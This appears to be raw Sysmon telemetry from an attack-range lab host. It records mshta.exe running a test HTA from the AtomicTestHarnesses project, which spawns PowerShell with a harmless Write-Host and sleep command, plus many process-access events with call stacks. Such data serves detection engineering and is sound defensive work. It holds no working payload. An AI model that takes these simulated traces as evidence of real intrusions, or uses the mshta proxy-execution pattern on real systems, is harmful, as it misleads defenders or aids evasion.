15:59:15.726{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023040Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.726{7901BC46-4A88-6008-F200-00000000A301}19122148C:\Windows\system32\csrss.exe{7901BC46-5353-6008-3106-00000000A301}4880C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000023039Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.726{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023038Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.726{7901BC46-5353-6008-3006-00000000A301}32328052C:\Windows\SysWOW64\mshta.exe{7901BC46-5353-6008-3106-00000000A301}4880C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\System32\windows.storage.dll+1240e6(wow64)|C:\Windows\System32\windows.storage.dll+123da1(wow64)|C:\Windows\System32\windows.storage.dll+123e73(wow64)|C:\Windows\System32\windows.storage.dll+124b45(wow64)|C:\Windows\System32\windows.storage.dll+1239f1(wow64)|C:\Windows\System32\windows.storage.dll+125d40(wow64)|C:\Windows\System32\windows.storage.dll+125fbc(wow64)|C:\Windows\System32\windows.storage.dll+1258a5(wow64)|C:\Windows\System32\shell32.dll+1a82b4(wow64)|C:\Windows\System32\shell32.dll+1a818e(wow64)|C:\Windows\System32\shell32.dll+13be0a(wow64)|C:\Windows\System32\shcore.dll+2fffa(wow64) 154100x800000000000000023037Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.737{7901BC46-5353-6008-3106-00000000A301}4880C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Write-Host aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa; Start-Sleep -Seconds 2; exitC:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=65D86C34814C02569E2AD53FD24E7F61,SHA256=8133502266008B77DE7921451E1210B0EF3F0ED2DB7D8D3EE0C3350D856FA6FA,IMPHASH=5E0145CEF36FA9BFBA7DE33AA683B8ED{7901BC46-5353-6008-3006-00000000A301}3232C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Administrator\Downloads\AtomicTestHarnesses-master\AtomicTestHarnesses-master\TestHarnesses\Test.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} 10341000x800000000000000023036Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.695{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-5353-6008-3006-00000000A301}3232C:\Windows\SysWOW64\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023035Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.695{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-5353-6008-3006-00000000A301}3232C:\Windows\SysWOW64\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023034Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.695{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-5353-6008-3006-00000000A301}3232C:\Windows\SysWOW64\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023033Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.679{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-5353-6008-3006-00000000A301}3232C:\Windows\SysWOW64\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023032Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.679{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-5353-6008-3006-00000000A301}3232C:\Windows\SysWOW64\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023031Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.663{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-5353-6008-3006-00000000A301}3232C:\Windows\SysWOW64\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023030Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.663{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5353-6008-3006-00000000A301}3232C:\Windows\SysWOW64\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023029Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.648{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023028Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.648{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023027Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.648{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023026Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.648{7901BC46-4A88-6008-F200-00000000A301}19124816C:\Windows\system32\csrss.exe{7901BC46-5353-6008-3006-00000000A301}3232C:\Windows\SysWOW64\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000023025Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.648{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023024Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.648{7901BC46-5353-6008-2F06-00000000A301}37165820C:\Windows\explorer.exe{7901BC46-5353-6008-3006-00000000A301}3232C:\Windows\SysWOW64\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\windows.storage.dll+1663de|C:\Windows\System32\windows.storage.dll+1660d2|C:\Windows\System32\SHELL32.dll+8fe71|C:\Windows\System32\SHELL32.dll+8ecd6|C:\Windows\System32\SHELL32.dll+cfbb1|C:\Windows\System32\SHELL32.dll+b5dbe|C:\Windows\System32\SHELL32.dll+8db63|C:\Windows\System32\SHELL32.dll+8da2b|C:\Windows\System32\SHELL32.dll+8d347|C:\Windows\System32\SHELL32.dll+6b47e|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 154100x800000000000000023023Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.651{7901BC46-5353-6008-3006-00000000A301}3232C:\Windows\SysWOW64\mshta.exe11.00.14393.2007 (rs1_release.171231-1800)Microsoft (R) HTML Application hostInternet ExplorerMicrosoft CorporationMSHTA.EXE"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Administrator\Downloads\AtomicTestHarnesses-master\AtomicTestHarnesses-master\TestHarnesses\Test.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} C:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=A65AE0DB1DAA6B07C89DCC1E21D3EB42,SHA256=5B6429B98ADF532E6F694C9A6CD1A1943B4AA3D5EA524D4FB353939FD9C61342,IMPHASH=79925B1930721457F5E11BF877806843{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding 10341000x800000000000000023022Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.632{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023021Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.632{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023020Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.616{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023019Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.601{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023018Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.601{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023017Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.585{7901BC46-4A88-6008-F200-00000000A301}19124816C:\Windows\system32\csrss.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000023016Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.585{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023015Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.585{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023014Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.585{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023013Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 